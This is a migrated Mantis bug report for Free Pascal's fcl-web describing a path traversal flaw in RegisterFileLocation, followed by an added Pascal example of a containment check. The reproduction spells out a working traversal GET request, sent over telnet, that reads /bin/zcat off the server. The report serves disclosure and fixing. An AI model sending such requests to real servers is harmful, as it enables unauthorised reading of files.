[fcl-web] Can access any file on the server if RegisterFileLocation is used.
Original Reporter info from Mantis: alex256 @alex65536
- Reporter name:
Description:
TFPCustomFileModule doesn't check for ".." in the path, so it can lead to access to files outside of the mapped directory. So, we can download any file from the server if we know its path.
Steps to reproduce:
Somewhere in the server code:
RegisterFileLocation('data', './data');
We will try to download /bin/zcat. So, we should send a GET request to http://localhost:8080/data/../../../../../../../../../../../../../bin/zcat
But browsers fold such paths client-side, so we will send a request using telnet:
$ telnet localhost 8080
Trying ::1...
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /data/../../../../../../../../../../../../../bin/zcat HTTP/1.1
Host: localhost:8080

HTTP/1.1 200 OK
Status: 200 OK
Content-Length: 1937
Content-Type: Application/octet-stream

#!/bin/sh
# Uncompress files to standard output.
# Copyright (C) 2007 Free Software Foundation
...
Mantis conversion info:
- Mantis ID: 33950
- OS: Debian GNU/Linux
- OS Build: 10
- Platform: x86_64-Linux
- Version: 3.0.4
- Fixed in version: 3.1.1
- Fixed in revision: 39405 (#45224949)
- Target version: 3.2.0
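
The missing check described in this report can be expressed as a containment test on the resolved path. The following is an added example, not code from fcl-web, from the reporter, or from the fix referenced above; `ResolveInside` is a hypothetical helper, the sample request paths are constructed, and the path is assumed to be URL-decoded already.

```pascal
program safemap;
{$mode objfpc}{$H+}

uses
  SysUtils;

{ Hypothetical helper: maps RelPath (the part of the URL after the registered
  location, already URL-decoded) onto BaseDir. Returns True and the absolute
  path only if the result stays inside BaseDir. }
function ResolveInside(const BaseDir, RelPath: string;
  out FullPath: string): Boolean;
var
  Root: string;
begin
  // Absolute form of the mapped directory. The trailing delimiter makes the
  // prefix test below reject siblings such as "data-private" for "data".
  Root := IncludeTrailingPathDelimiter(ExpandFileName(BaseDir));
  // ExpandFileName collapses "." and ".." segments lexically. It does not
  // resolve symbolic links, so links inside BaseDir need separate handling.
  FullPath := ExpandFileName(Root + RelPath);
  // The resolved path must be strictly below Root, not Root itself.
  Result := (Length(FullPath) > Length(Root)) and
            (Copy(FullPath, 1, Length(Root)) = Root);
  if not Result then
    FullPath := '';
end;

const
  // Constructed sample request paths.
  Samples: array[0..3] of string = (
    'index.html',
    'sub/../index.html',
    '../../../../bin/zcat',
    '../data-private/secret.txt');
var
  S, P: string;
begin
  for S in Samples do
    if ResolveInside('./data', S, P) then
      WriteLn('serve  ', S, ' -> ', P)
    else
      WriteLn('reject ', S);   // a server would answer 404 here
end.
```

The first two samples resolve to files under `./data` and are served; the last two resolve outside it and are rejected.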